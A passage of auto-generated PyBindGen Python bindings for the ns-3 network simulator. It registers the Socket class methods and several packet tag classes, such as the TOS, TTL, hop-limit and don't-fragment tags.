    cls.add_constructor([param('ns3::Socket const &', 'arg0')])
    ## socket.h (module 'network'): ns3::Socket::Socket() [constructor]
    cls.add_constructor([])
    ## socket.h (module 'network'): int ns3::Socket::Bind(ns3::Address const & address) [member function]
    cls.add_method('Bind',
                   'int',
                   [param('ns3::Address const &', 'address')],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::Bind() [member function]
    cls.add_method('Bind',
                   'int',
                   [],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::Bind6() [member function]
    cls.add_method('Bind6',
                   'int',
                   [],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::Socket::BindToNetDevice(ns3::Ptr<ns3::NetDevice> netdevice) [member function]
    cls.add_method('BindToNetDevice',
                   'void',
                   [param('ns3::Ptr< ns3::NetDevice >', 'netdevice')],
                   is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::Close() [member function]
    cls.add_method('Close',
                   'int',
                   [],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::Connect(ns3::Address const & address) [member function]
    cls.add_method('Connect',
                   'int',
                   [param('ns3::Address const &', 'address')],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): static ns3::Ptr<ns3::Socket> ns3::Socket::CreateSocket(ns3::Ptr<ns3::Node> node, ns3::TypeId tid) [member function]
    cls.add_method('CreateSocket',
                   'ns3::Ptr< ns3::Socket >',
                   [param('ns3::Ptr< ns3::Node >', 'node'), param('ns3::TypeId', 'tid')],
                   is_static=True)
    ## socket.h (module 'network'): bool ns3::Socket::GetAllowBroadcast() const [member function]
    cls.add_method('GetAllowBroadcast',
                   'bool',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): ns3::Ptr<ns3::NetDevice> ns3::Socket::GetBoundNetDevice() [member function]
    cls.add_method('GetBoundNetDevice',
                   'ns3::Ptr< ns3::NetDevice >',
                   [])
    ## socket.h (module 'network'): ns3::Socket::SocketErrno ns3::Socket::GetErrno() const [member function]
    cls.add_method('GetErrno',
                   'ns3::Socket::SocketErrno',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint8_t ns3::Socket::GetIpTos() const [member function]
    cls.add_method('GetIpTos',
                   'uint8_t',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): uint8_t ns3::Socket::GetIpTtl() const [member function]
    cls.add_method('GetIpTtl',
                   'uint8_t',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint8_t ns3::Socket::GetIpv6HopLimit() const [member function]
    cls.add_method('GetIpv6HopLimit',
                   'uint8_t',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint8_t ns3::Socket::GetIpv6Tclass() const [member function]
    cls.add_method('GetIpv6Tclass',
                   'uint8_t',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): ns3::Ptr<ns3::Node> ns3::Socket::GetNode() const [member function]
    cls.add_method('GetNode',
                   'ns3::Ptr< ns3::Node >',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint32_t ns3::Socket::GetRxAvailable() const [member function]
    cls.add_method('GetRxAvailable',
                   'uint32_t',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::GetSockName(ns3::Address & address) const [member function]
    cls.add_method('GetSockName',
                   'int',
                   [param('ns3::Address &', 'address')],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): ns3::Socket::SocketType ns3::Socket::GetSocketType() const [member function]
    cls.add_method('GetSocketType',
                   'ns3::Socket::SocketType',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint32_t ns3::Socket::GetTxAvailable() const [member function]
    cls.add_method('GetTxAvailable',
                   'uint32_t',
                   [],
                   is_pure_virtual=True, is_const=True, is_virtual=True)
    ## socket.h (module 'network'): static ns3::TypeId ns3::Socket::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## socket.h (module 'network'): bool ns3::Socket::IsIpRecvTos() const [member function]
    cls.add_method('IsIpRecvTos',
                   'bool',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): bool ns3::Socket::IsIpRecvTtl() const [member function]
    cls.add_method('IsIpRecvTtl',
                   'bool',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): bool ns3::Socket::IsIpv6RecvHopLimit() const [member function]
    cls.add_method('IsIpv6RecvHopLimit',
                   'bool',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): bool ns3::Socket::IsIpv6RecvTclass() const [member function]
    cls.add_method('IsIpv6RecvTclass',
                   'bool',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): bool ns3::Socket::IsRecvPktInfo() const [member function]
    cls.add_method('IsRecvPktInfo',
                   'bool',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): int ns3::Socket::Listen() [member function]
    cls.add_method('Listen',
                   'int',
                   [],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv(uint32_t maxSize, uint32_t flags) [member function]
    cls.add_method('Recv',
                   'ns3::Ptr< ns3::Packet >',
                   [param('uint32_t', 'maxSize'), param('uint32_t', 'flags')],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::Recv() [member function]
    cls.add_method('Recv',
                   'ns3::Ptr< ns3::Packet >',
                   [])
    ## socket.h (module 'network'): int ns3::Socket::Recv(uint8_t * buf, uint32_t size, uint32_t flags) [member function]
    cls.add_method('Recv',
                   'int',
                   [param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
    ## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(uint32_t maxSize, uint32_t flags, ns3::Address & fromAddress) [member function]
    cls.add_method('RecvFrom',
                   'ns3::Ptr< ns3::Packet >',
                   [param('uint32_t', 'maxSize'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): ns3::Ptr<ns3::Packet> ns3::Socket::RecvFrom(ns3::Address & fromAddress) [member function]
    cls.add_method('RecvFrom',
                   'ns3::Ptr< ns3::Packet >',
                   [param('ns3::Address &', 'fromAddress')])
    ## socket.h (module 'network'): int ns3::Socket::RecvFrom(uint8_t * buf, uint32_t size, uint32_t flags, ns3::Address & fromAddress) [member function]
    cls.add_method('RecvFrom',
                   'int',
                   [param('uint8_t *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address &', 'fromAddress')])
    ## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p, uint32_t flags) [member function]
    cls.add_method('Send',
                   'int',
                   [param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags')],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::Send(ns3::Ptr<ns3::Packet> p) [member function]
    cls.add_method('Send',
                   'int',
                   [param('ns3::Ptr< ns3::Packet >', 'p')])
    ## socket.h (module 'network'): int ns3::Socket::Send(uint8_t const * buf, uint32_t size, uint32_t flags) [member function]
    cls.add_method('Send',
                   'int',
                   [param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags')])
    ## socket.h (module 'network'): int ns3::Socket::SendTo(ns3::Ptr<ns3::Packet> p, uint32_t flags, ns3::Address const & toAddress) [member function]
    cls.add_method('SendTo',
                   'int',
                   [param('ns3::Ptr< ns3::Packet >', 'p'), param('uint32_t', 'flags'), param('ns3::Address const &', 'toAddress')],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::SendTo(uint8_t const * buf, uint32_t size, uint32_t flags, ns3::Address const & address) [member function]
    cls.add_method('SendTo',
                   'int',
                   [param('uint8_t const *', 'buf'), param('uint32_t', 'size'), param('uint32_t', 'flags'), param('ns3::Address const &', 'address')])
    ## socket.h (module 'network'): void ns3::Socket::SetAcceptCallback(ns3::Callback<bool, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionRequest, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::Address const&, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> newConnectionCreated) [member function]
    cls.add_method('SetAcceptCallback',
                   'void',
                   [param('ns3::Callback< bool, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionRequest'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::Address const &, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'newConnectionCreated')])
    ## socket.h (module 'network'): bool ns3::Socket::SetAllowBroadcast(bool allowBroadcast) [member function]
    cls.add_method('SetAllowBroadcast',
                   'bool',
                   [param('bool', 'allowBroadcast')],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::Socket::SetCloseCallbacks(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> normalClose, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> errorClose) [member function]
    cls.add_method('SetCloseCallbacks',
                   'void',
                   [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'normalClose'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'errorClose')])
    ## socket.h (module 'network'): void ns3::Socket::SetConnectCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionSucceeded, ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> connectionFailed) [member function]
    cls.add_method('SetConnectCallback',
                   'void',
                   [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionSucceeded'), param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'connectionFailed')])
    ## socket.h (module 'network'): void ns3::Socket::SetDataSentCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> dataSent) [member function]
    cls.add_method('SetDataSentCallback',
                   'void',
                   [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'dataSent')])
    ## socket.h (module 'network'): void ns3::Socket::SetIpRecvTos(bool ipv4RecvTos) [member function]
    cls.add_method('SetIpRecvTos',
                   'void',
                   [param('bool', 'ipv4RecvTos')])
    ## socket.h (module 'network'): void ns3::Socket::SetIpRecvTtl(bool ipv4RecvTtl) [member function]
    cls.add_method('SetIpRecvTtl',
                   'void',
                   [param('bool', 'ipv4RecvTtl')])
    ## socket.h (module 'network'): void ns3::Socket::SetIpTos(uint8_t ipTos) [member function]
    cls.add_method('SetIpTos',
                   'void',
                   [param('uint8_t', 'ipTos')])
    ## socket.h (module 'network'): void ns3::Socket::SetIpTtl(uint8_t ipTtl) [member function]
    cls.add_method('SetIpTtl',
                   'void',
                   [param('uint8_t', 'ipTtl')],
                   is_virtual=True)
    ## socket.h (module 'network'): void ns3::Socket::SetIpv6HopLimit(uint8_t ipHopLimit) [member function]
    cls.add_method('SetIpv6HopLimit',
                   'void',
                   [param('uint8_t', 'ipHopLimit')],
                   is_virtual=True)
    ## socket.h (module 'network'): void ns3::Socket::SetIpv6RecvHopLimit(bool ipv6RecvHopLimit) [member function]
    cls.add_method('SetIpv6RecvHopLimit',
                   'void',
                   [param('bool', 'ipv6RecvHopLimit')])
    ## socket.h (module 'network'): void ns3::Socket::SetIpv6RecvTclass(bool ipv6RecvTclass) [member function]
    cls.add_method('SetIpv6RecvTclass',
                   'void',
                   [param('bool', 'ipv6RecvTclass')])
    ## socket.h (module 'network'): void ns3::Socket::SetIpv6Tclass(int ipTclass) [member function]
    cls.add_method('SetIpv6Tclass',
                   'void',
                   [param('int', 'ipTclass')])
    ## socket.h (module 'network'): void ns3::Socket::SetRecvCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> arg0) [member function]
    cls.add_method('SetRecvCallback',
                   'void',
                   [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'arg0')])
    ## socket.h (module 'network'): void ns3::Socket::SetRecvPktInfo(bool flag) [member function]
    cls.add_method('SetRecvPktInfo',
                   'void',
                   [param('bool', 'flag')])
    ## socket.h (module 'network'): void ns3::Socket::SetSendCallback(ns3::Callback<void, ns3::Ptr<ns3::Socket>, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> sendCb) [member function]
    cls.add_method('SetSendCallback',
                   'void',
                   [param('ns3::Callback< void, ns3::Ptr< ns3::Socket >, unsigned int, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'sendCb')])
    ## socket.h (module 'network'): int ns3::Socket::ShutdownRecv() [member function]
    cls.add_method('ShutdownRecv',
                   'int',
                   [],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): int ns3::Socket::ShutdownSend() [member function]
    cls.add_method('ShutdownSend',
                   'int',
                   [],
                   is_pure_virtual=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::Socket::DoDispose() [member function]
    cls.add_method('DoDispose',
                   'void',
                   [],
                   visibility='protected', is_virtual=True)
    ## socket.h (module 'network'): bool ns3::Socket::IsManualIpTos() const [member function]
    cls.add_method('IsManualIpTos',
                   'bool',
                   [],
                   is_const=True, visibility='protected')
    ## socket.h (module 'network'): bool ns3::Socket::IsManualIpTtl() const [member function]
    cls.add_method('IsManualIpTtl',
                   'bool',
                   [],
                   is_const=True, visibility='protected')
    ## socket.h (module 'network'): bool ns3::Socket::IsManualIpv6HopLimit() const [member function]
    cls.add_method('IsManualIpv6HopLimit',
                   'bool',
                   [],
                   is_const=True, visibility='protected')
    ## socket.h (module 'network'): bool ns3::Socket::IsManualIpv6Tclass() const [member function]
    cls.add_method('IsManualIpv6Tclass',
                   'bool',
                   [],
                   is_const=True, visibility='protected')
    ## socket.h (module 'network'): void ns3::Socket::NotifyConnectionFailed() [member function]
    cls.add_method('NotifyConnectionFailed',
                   'void',
                   [],
                   visibility='protected')
    ## socket.h (module 'network'): bool ns3::Socket::NotifyConnectionRequest(ns3::Address const & from) [member function]
    cls.add_method('NotifyConnectionRequest',
                   'bool',
                   [param('ns3::Address const &', 'from')],
                   visibility='protected')
    ## socket.h (module 'network'): void ns3::Socket::NotifyConnectionSucceeded() [member function]
    cls.add_method('NotifyConnectionSucceeded',
                   'void',
                   [],
                   visibility='protected')
    ## socket.h (module 'network'): void ns3::Socket::NotifyDataRecv() [member function]
    cls.add_method('NotifyDataRecv',
                   'void',
                   [],
                   visibility='protected')
    ## socket.h (module 'network'): void ns3::Socket::NotifyDataSent(uint32_t size) [member function]
    cls.add_method('NotifyDataSent',
                   'void',
                   [param('uint32_t', 'size')],
                   visibility='protected')
    ## socket.h (module 'network'): void ns3::Socket::NotifyErrorClose() [member function]
    cls.add_method('NotifyErrorClose',
                   'void',
                   [],
                   visibility='protected')
    ## socket.h (module 'network'): void ns3::Socket::NotifyNewConnectionCreated(ns3::Ptr<ns3::Socket> socket, ns3::Address const & from) [member function]
    cls.add_method('NotifyNewConnectionCreated',
                   'void',
                   [param('ns3::Ptr< ns3::Socket >', 'socket'), param('ns3::Address const &', 'from')],
                   visibility='protected')
    ## socket.h (module 'network'): void ns3::Socket::NotifyNormalClose() [member function]
    cls.add_method('NotifyNormalClose',
                   'void',
                   [],
                   visibility='protected')
    ## socket.h (module 'network'): void ns3::Socket::NotifySend(uint32_t spaceAvailable) [member function]
    cls.add_method('NotifySend',
                   'void',
                   [param('uint32_t', 'spaceAvailable')],
                   visibility='protected')
    return
def register_Ns3SocketAddressTag_methods(root_module, cls):
    """Register bindings for ns3::SocketAddressTag (packet tag carrying an Address).

    Registers constructors, the Tag serialization interface
    (Deserialize/Serialize/GetSerializedSize/Print/GetInstanceTypeId),
    GetTypeId, and the GetAddress/SetAddress accessors on *cls*.
    Generated by PyBindGen — do not edit by hand.
    """
    ## socket.h (module 'network'): ns3::SocketAddressTag::SocketAddressTag(ns3::SocketAddressTag const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::SocketAddressTag const &', 'arg0')])
    ## socket.h (module 'network'): ns3::SocketAddressTag::SocketAddressTag() [constructor]
    cls.add_constructor([])
    ## socket.h (module 'network'): void ns3::SocketAddressTag::Deserialize(ns3::TagBuffer i) [member function]
    cls.add_method('Deserialize',
                   'void',
                   [param('ns3::TagBuffer', 'i')],
                   is_virtual=True)
    ## socket.h (module 'network'): ns3::Address ns3::SocketAddressTag::GetAddress() const [member function]
    cls.add_method('GetAddress',
                   'ns3::Address',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): ns3::TypeId ns3::SocketAddressTag::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId',
                   'ns3::TypeId',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint32_t ns3::SocketAddressTag::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize',
                   'uint32_t',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): static ns3::TypeId ns3::SocketAddressTag::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## socket.h (module 'network'): void ns3::SocketAddressTag::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::SocketAddressTag::Serialize(ns3::TagBuffer i) const [member function]
    cls.add_method('Serialize',
                   'void',
                   [param('ns3::TagBuffer', 'i')],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::SocketAddressTag::SetAddress(ns3::Address addr) [member function]
    cls.add_method('SetAddress',
                   'void',
                   [param('ns3::Address', 'addr')])
    return
def register_Ns3SocketIpTosTag_methods(root_module, cls):
    """Register bindings for ns3::SocketIpTosTag (packet tag carrying the IPv4 TOS byte).

    Registers constructors, the Tag serialization interface, GetTypeId, and
    the GetTos/SetTos accessors on *cls*.  Generated by PyBindGen — do not
    edit by hand.
    """
    ## socket.h (module 'network'): ns3::SocketIpTosTag::SocketIpTosTag(ns3::SocketIpTosTag const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::SocketIpTosTag const &', 'arg0')])
    ## socket.h (module 'network'): ns3::SocketIpTosTag::SocketIpTosTag() [constructor]
    cls.add_constructor([])
    ## socket.h (module 'network'): void ns3::SocketIpTosTag::Deserialize(ns3::TagBuffer i) [member function]
    cls.add_method('Deserialize',
                   'void',
                   [param('ns3::TagBuffer', 'i')],
                   is_virtual=True)
    ## socket.h (module 'network'): ns3::TypeId ns3::SocketIpTosTag::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId',
                   'ns3::TypeId',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint32_t ns3::SocketIpTosTag::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize',
                   'uint32_t',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint8_t ns3::SocketIpTosTag::GetTos() const [member function]
    cls.add_method('GetTos',
                   'uint8_t',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpTosTag::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## socket.h (module 'network'): void ns3::SocketIpTosTag::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::SocketIpTosTag::Serialize(ns3::TagBuffer i) const [member function]
    cls.add_method('Serialize',
                   'void',
                   [param('ns3::TagBuffer', 'i')],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::SocketIpTosTag::SetTos(uint8_t tos) [member function]
    cls.add_method('SetTos',
                   'void',
                   [param('uint8_t', 'tos')])
    return
def register_Ns3SocketIpTtlTag_methods(root_module, cls):
    """Register bindings for ns3::SocketIpTtlTag (packet tag carrying the IPv4 TTL).

    Registers constructors, the Tag serialization interface, GetTypeId, and
    the GetTtl/SetTtl accessors on *cls*.  Generated by PyBindGen — do not
    edit by hand.
    """
    ## socket.h (module 'network'): ns3::SocketIpTtlTag::SocketIpTtlTag(ns3::SocketIpTtlTag const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::SocketIpTtlTag const &', 'arg0')])
    ## socket.h (module 'network'): ns3::SocketIpTtlTag::SocketIpTtlTag() [constructor]
    cls.add_constructor([])
    ## socket.h (module 'network'): void ns3::SocketIpTtlTag::Deserialize(ns3::TagBuffer i) [member function]
    cls.add_method('Deserialize',
                   'void',
                   [param('ns3::TagBuffer', 'i')],
                   is_virtual=True)
    ## socket.h (module 'network'): ns3::TypeId ns3::SocketIpTtlTag::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId',
                   'ns3::TypeId',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint32_t ns3::SocketIpTtlTag::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize',
                   'uint32_t',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint8_t ns3::SocketIpTtlTag::GetTtl() const [member function]
    cls.add_method('GetTtl',
                   'uint8_t',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpTtlTag::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## socket.h (module 'network'): void ns3::SocketIpTtlTag::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::SocketIpTtlTag::Serialize(ns3::TagBuffer i) const [member function]
    cls.add_method('Serialize',
                   'void',
                   [param('ns3::TagBuffer', 'i')],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::SocketIpTtlTag::SetTtl(uint8_t ttl) [member function]
    cls.add_method('SetTtl',
                   'void',
                   [param('uint8_t', 'ttl')])
    return
def register_Ns3SocketIpv6HopLimitTag_methods(root_module, cls):
    """Register bindings for ns3::SocketIpv6HopLimitTag (packet tag carrying the IPv6 hop limit).

    Registers constructors, the Tag serialization interface, GetTypeId, and
    the GetHopLimit/SetHopLimit accessors on *cls*.  Generated by PyBindGen —
    do not edit by hand.
    """
    ## socket.h (module 'network'): ns3::SocketIpv6HopLimitTag::SocketIpv6HopLimitTag(ns3::SocketIpv6HopLimitTag const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::SocketIpv6HopLimitTag const &', 'arg0')])
    ## socket.h (module 'network'): ns3::SocketIpv6HopLimitTag::SocketIpv6HopLimitTag() [constructor]
    cls.add_constructor([])
    ## socket.h (module 'network'): void ns3::SocketIpv6HopLimitTag::Deserialize(ns3::TagBuffer i) [member function]
    cls.add_method('Deserialize',
                   'void',
                   [param('ns3::TagBuffer', 'i')],
                   is_virtual=True)
    ## socket.h (module 'network'): uint8_t ns3::SocketIpv6HopLimitTag::GetHopLimit() const [member function]
    cls.add_method('GetHopLimit',
                   'uint8_t',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): ns3::TypeId ns3::SocketIpv6HopLimitTag::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId',
                   'ns3::TypeId',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint32_t ns3::SocketIpv6HopLimitTag::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize',
                   'uint32_t',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpv6HopLimitTag::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## socket.h (module 'network'): void ns3::SocketIpv6HopLimitTag::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::SocketIpv6HopLimitTag::Serialize(ns3::TagBuffer i) const [member function]
    cls.add_method('Serialize',
                   'void',
                   [param('ns3::TagBuffer', 'i')],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::SocketIpv6HopLimitTag::SetHopLimit(uint8_t hopLimit) [member function]
    cls.add_method('SetHopLimit',
                   'void',
                   [param('uint8_t', 'hopLimit')])
    return
def register_Ns3SocketIpv6TclassTag_methods(root_module, cls):
    """Register bindings for ns3::SocketIpv6TclassTag (packet tag carrying the IPv6 traffic class).

    Registers constructors, the Tag serialization interface, GetTypeId, and
    the GetTclass/SetTclass accessors on *cls*.  Generated by PyBindGen —
    do not edit by hand.
    """
    ## socket.h (module 'network'): ns3::SocketIpv6TclassTag::SocketIpv6TclassTag(ns3::SocketIpv6TclassTag const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::SocketIpv6TclassTag const &', 'arg0')])
    ## socket.h (module 'network'): ns3::SocketIpv6TclassTag::SocketIpv6TclassTag() [constructor]
    cls.add_constructor([])
    ## socket.h (module 'network'): void ns3::SocketIpv6TclassTag::Deserialize(ns3::TagBuffer i) [member function]
    cls.add_method('Deserialize',
                   'void',
                   [param('ns3::TagBuffer', 'i')],
                   is_virtual=True)
    ## socket.h (module 'network'): ns3::TypeId ns3::SocketIpv6TclassTag::GetInstanceTypeId() const [member function]
    cls.add_method('GetInstanceTypeId',
                   'ns3::TypeId',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint32_t ns3::SocketIpv6TclassTag::GetSerializedSize() const [member function]
    cls.add_method('GetSerializedSize',
                   'uint32_t',
                   [],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): uint8_t ns3::SocketIpv6TclassTag::GetTclass() const [member function]
    cls.add_method('GetTclass',
                   'uint8_t',
                   [],
                   is_const=True)
    ## socket.h (module 'network'): static ns3::TypeId ns3::SocketIpv6TclassTag::GetTypeId() [member function]
    cls.add_method('GetTypeId',
                   'ns3::TypeId',
                   [],
                   is_static=True)
    ## socket.h (module 'network'): void ns3::SocketIpv6TclassTag::Print(std::ostream & os) const [member function]
    cls.add_method('Print',
                   'void',
                   [param('std::ostream &', 'os')],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::SocketIpv6TclassTag::Serialize(ns3::TagBuffer i) const [member function]
    cls.add_method('Serialize',
                   'void',
                   [param('ns3::TagBuffer', 'i')],
                   is_const=True, is_virtual=True)
    ## socket.h (module 'network'): void ns3::SocketIpv6TclassTag::SetTclass(uint8_t tclass) [member function]
    cls.add_method('SetTclass',
                   'void',
                   [param('uint8_t', 'tclass')])
    return
def register_Ns3SocketSetDontFragmentTag_methods(root_module, cls):
    """Register bindings for ns3::SocketSetDontFragmentTag (packet tag for the IPv4 DF bit).

    Registers constructors, the Tag serialization interface, GetTypeId, and
    the Enable/Disable/IsEnabled flag accessors on *cls*.  Generated by
    PyBindGen — do not edit by hand.
    """
    ## socket.h (module 'network'): ns3::SocketSetDontFragmentTag::SocketSetDontFragmentTag(ns3::SocketSetDontFragmentTag const & arg0) [copy constructor]
    cls.add_constructor([param('ns3::SocketSetDontFragmentTag const &', 'arg0')])
    ## socket.h (module 'network'): ns3::SocketSetDontFragmentTag::SocketSetDontFragmentTag() [constructor]
    cls.add_constructor([])
    ## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Deserialize(ns3::TagBuffer i) [member function]
    cls.add_method('Deserialize',
                   'void',
                   [param('ns3::TagBuffer', 'i')],
                   is_virtual=True)
    ## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Disable() [member function]
    cls.add_method('Disable',
                   'void',
                   [])
    ## socket.h (module 'network'): void ns3::SocketSetDontFragmentTag::Enable() [member function]
    cls.add_method('Enable',
                   'void',
                   [])
    ## socket.h (module 'network'): ns3::TypeId ns3::SocketSetDontFragmentTag::GetInstanceTypeId() const [member function]
